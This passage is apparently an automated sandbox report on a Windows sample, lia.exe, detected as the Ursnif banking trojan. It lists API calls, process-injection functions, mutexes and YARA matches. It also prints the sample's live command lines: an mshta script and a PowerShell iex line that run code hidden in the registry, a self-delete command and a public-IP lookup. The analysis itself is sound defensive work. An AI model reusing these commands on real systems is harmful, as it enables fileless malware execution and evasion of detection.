Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47EA6D0	34_2_00000215F47EA6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F52CC	34_2_00000215F47F52CC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E12BC	34_2_00000215F47E12BC
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4802330	34_2_00000215F4802330
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FFF4C	34_2_00000215F47FFF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E7F64	34_2_00000215F47E7F64
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F4807EA0	34_2_00000215F4807EA0
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47ECF44	34_2_00000215F47ECF44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47F9740	34_2_00000215F47F9740
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C63BC	44_2_036C63BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CA241	44_2_036CA241
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CF1EE	44_2_036CF1EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B504A	44_2_036B504A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C78F1	44_2_036C78F1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BC086	44_2_036BC086
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CCF97	44_2_036CCF97
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B9D64	44_2_036B9D64
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B95FE	44_2_036B95FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D5430	44_2_036D5430
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B34DC	44_2_036B34DC

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_039DE6B9 CreateProcessAsUserA,

1_2_039DE6B9

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Uses 32bit PE files

Source: lia.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains functionality to call native functions

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_0040140F NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	1_2_0040140F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_0040182F GetProcAddress,NtCreateSection,memset,	1_2_0040182F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00401ABC NtMapViewOfSection,	1_2_00401ABC
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B160A0 NtMapViewOfSection,	1_2_00B160A0
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B15D85 GetProcAddress,NtCreateSection,memset,	1_2_00B15D85
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1231E NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00B1231E
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B18185 NtQueryVirtualMemory,	1_2_00B18185
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	1_2_039EB38D
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DD317 NtMapViewOfSection,	1_2_039DD317
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039ECEED GetProcAddress,NtCreateSection,memset,	1_2_039ECEED
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F1AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_039F1AE3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D76E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_039D76E3
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DD274 NtQueryInformationProcess,	1_2_039DD274
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_039F29E0
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E2931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039E2931
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_039E7523
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039D317C
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_039D696A
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D8C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_039D8C10
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D3F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_039D3F97
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E0B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039E0B30
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_039E7EEF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D1641 memset,NtQueryInformationProcess,	1_2_039D1641
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D155B NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_039D155B
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F389B NtGetContextThread,RtlNtStatusToDosError,	1_2_039F389B
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EE4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_039EE4D5
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_039D483A
Source: C:\Windows\System32\control.exe	Code function: 18_2_00526140 NtAllocateVirtualMemory,	18_2_00526140
Source: C:\Windows\System32\control.exe	Code function: 18_2_00539994 NtReadVirtualMemory,	18_2_00539994
Source: C:\Windows\System32\control.exe	Code function: 18_2_00521B84 NtQueryInformationProcess,	18_2_00521B84
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	18_2_0053AC44
Source: C:\Windows\System32\control.exe	Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	18_2_00543C1C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose,	18_2_0054B58C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00540E70 NtMapViewOfSection,	18_2_00540E70
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052E614 NtCreateSection,	18_2_0052E614
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052FF60 RtlAllocateHeap,NtQueryInformationProcess,	18_2_0052FF60
Source: C:\Windows\System32\control.exe	Code function: 18_2_00521FBC NtWriteVirtualMemory,	18_2_00521FBC
Source: C:\Windows\System32\control.exe	Code function: 18_2_0055F003 NtProtectVirtualMemory,NtProtectVirtualMemory,	18_2_0055F003
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess,	34_2_00000215F47E1B84
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FAC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	34_2_00000215F47FAC44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory,	34_2_00000215F481F003
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BD274 NtQueryInformationProcess,	44_2_036BD274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D1AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	44_2_036D1AE3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	44_2_036D29E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	44_2_036C7523
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B1641 memset,NtQueryInformationProcess,	44_2_036B1641
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	44_2_036C7EEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B155B NtQuerySystemInformation,RtlNtStatusToDosError,	44_2_036B155B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CE4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	44_2_036CE4D5

Sample file is different than original file name gathered from version info

Source: lia.exe, 00000001.00000003.469621415.0000000004144000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs lia.exe

Source: lia.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220112

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@34/19@9/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: lia.exe	Virustotal: Detection: 64%
Source: lia.exe	ReversingLabs: Detection: 74%

Source: C:\Users\user\Desktop\lia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lia.exe "C:\Users\user\Desktop\lia.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"
Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0usnm2v.qwh.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B11141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00B11141

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{52A61B79-8911-546D-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:804:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8A03E515-611D-4C17-3B5E-25409F722974}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B69CECF8-9D6C-5805-D74A-210CFB1EE500}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_01
Source: C:\Users\user\Desktop\lia.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D2B9349F-090F-D44C-2326-4D4807BAD1FC}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6A55D138-C185-2CA4-9B3E-8520FF528954}

Source: C:\Users\user\Desktop\lia.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source:	Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B6BE push ebp; retf	1_2_00B1B6BF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B804 push 00000055h; iretd	1_2_00B1B808
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17BE0 push ecx; ret	1_2_00B17BE9
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B72E push ecx; ret	1_2_00B1B734
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17F4F push ecx; ret	1_2_00B17F5F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F541F push ecx; ret	1_2_039F542F
Source: C:\Windows\System32\control.exe	Code function: 18_2_005472FD push 3B000001h; retf	18_2_00547302
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F48072FD push 3B000001h; retf	34_2_00000215F4807302
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D5070 push ecx; ret	44_2_036D5079
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D3D42 push ss; ret	44_2_036D3D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D541F push ecx; ret	44_2_036D542F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress,

1_2_004012E6

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
